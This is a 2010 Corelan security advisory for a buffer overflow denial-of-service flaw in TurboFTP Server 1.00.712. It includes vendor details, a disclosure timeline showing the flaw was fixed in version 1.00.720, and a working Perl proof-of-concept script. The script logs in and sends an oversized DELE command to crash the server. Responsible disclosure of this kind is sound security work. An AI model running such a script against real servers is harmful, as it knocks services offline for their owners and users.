[CORELAN-10-004] TurboFTP Server 1.00.712 remote DoS

2010-01-17T00:00:00
ID SECURITYVULNS:DOC:23049
Type securityvulns
Reporter Securityvulns
Modified 2010-01-17T00:00:00

Description

|------------------------------------------------------------------| | | | _ __ / / / /_ _ | | / / _ \/ / _ \/ / `/ \ / / _ \/ `/ ` \ | | / // /_/ / / / / / // / / / / / // / // / / / / / / | | \/\// \//\,// // \/\/\,// // // | | | | http://www.corelan.be:8800 | | security@corelan.be | | | |-------------------------------------------------[ EIP Hunters ]--| | | | Vulnerability Disclosure Report | | | |------------------------------------------------------------------|

Advisory : CORELAN-10-004 Disclosure date : Jan 12, 2010 Corelan Reference : http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/

0x00 : Vulnerability information

[] Product : Turbo FTP Server [] Version : 1.00.712 [] Vendor : turbosoft inc [] URL : http://www.tbsoftinc.com [] Platform : Windows [] Type of vulnerability : Buffer overflow - DoS [] Risk rating : Medium [] Issue fixed in version : 1.00.720 [] Vulnerability discovered by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com) [] Greetings to : EdiStrosar, rick2600, mr_me, ekse & MarkoT from Corelan Team

0x01 : Vendor description of software

From the vendor website:

TurboFTP Server is a high performance, secure, scalable and management friendly file transfer server running on Windows platforms. With it you can easily set up a secure file transfer server that delivers regular FTP, FTP over SSL/TLS, and SFTP over SSH services with virtual domains, advanced directory access control, virtual folders, IP access control, flexible authentication options and many other features.

0x02 : Vulnerability details

The "Turbo FTP Server" ftp service is vulnerable to a buffer overflow, allowing a malicious person to trigger a Denial Of Service condition against this service.

In order to trigger the vulnerability, the remote client needs to be able to login and issue an specially crafted DELE command.

Note that other commands may be vulnerable too.

0x03 : Vendor communication

[] Dec 30, 2009 : Issue found [] Jan 1st, 2010 : contacted vendor [] Jan 1st, 2010 : vendor opened support ticket [] Jan 4th, 2010 : vendor asked for PoC code [] Jan 4th, 2010 : Poc Code sent [] Jan 7th, 2010 : Vendor acknowledged issue and starts fixing issue [] Jan 11th, 2010 : vendor released fixed version [] Jan 12th, 2010 : Public disclosure

Release notes (on Vendor website):

V 1.00 Build 720 - Jan 11, 2010

[-] Buffer overflow problems reported by Corelan Team. [-] A file open problem causing WinSCP failed to upload files. [-] A problem in log recycling causes server to stall.

0x04 : Exploit/PoC

Exploit Title : TurboFTP Server 1.00.712 Remote DoS

Date : 30 december 2009

Author : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)

Bug found by : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)

Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe

Version : 1.00.712

Issue fixed in: 1.00.720

OS : Windows

Tested on : XP SP3 En (VirtualBox)

Type of vuln : DoS

Greetz to : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse

Script provided 'as is', without any warranty.

Use for educational purposes only.

Code :

print "|------------------------------------------------------------------|\n"; print "| |\n"; print "| _ __ / / / /_ _ |\n"; print "| / / _ \\/ / _ \\/ / `/ \\ / / _ \\/ `/ ` \\ |\n"; print "| / // /_/ / / / / / // / / / / / // / // / / / / / / |\n"; print "| \\/\\// \\//\\,// // \\/\\/\\,// // // |\n"; print "| |\n"; print "| http://www.corelan.be:8800 |\n"; print "| |\n"; print "|-------------------------------------------------[ EIP Hunters ]--|\n\n"; print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";

use IO::Socket;

if ($#ARGV ne 3) { print "\n usage: $0 <targetip> <targetport> <user> <password>\n"; exit(0); }

my $user=$ARGV[2]; my $pass=$ARGV[3];

print " [+] Preparing DoS payload\n"; my $payload = "A" x 2000; print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n"; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto => 'tcp');

$ftp = <$sock> || die " [!] Unable to connect \n"; print " $ftp"; $ftp = <$sock>; print " $ftp"; print " [+] Logging in (user $user)\n"; print $sock "USER $user\r\n"; $ftp = <$sock>; print " $ftp"; print $sock "PASS $pass\r\n"; $ftp = <$sock>; print " $ftp"; print " [+] Sending payload\n"; print $sock "DELE ".$payload."\r\n"; $ftp = <$sock>; print " $ftp"; print " [+] Payload sent, now checking FTP server state\n"; $sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto => 'tcp'); my $ftp2 = <$sock2> || die " [+] DoS successful\n"; print " [!] DoS did not seem to work\n"; print " $ftp2\n";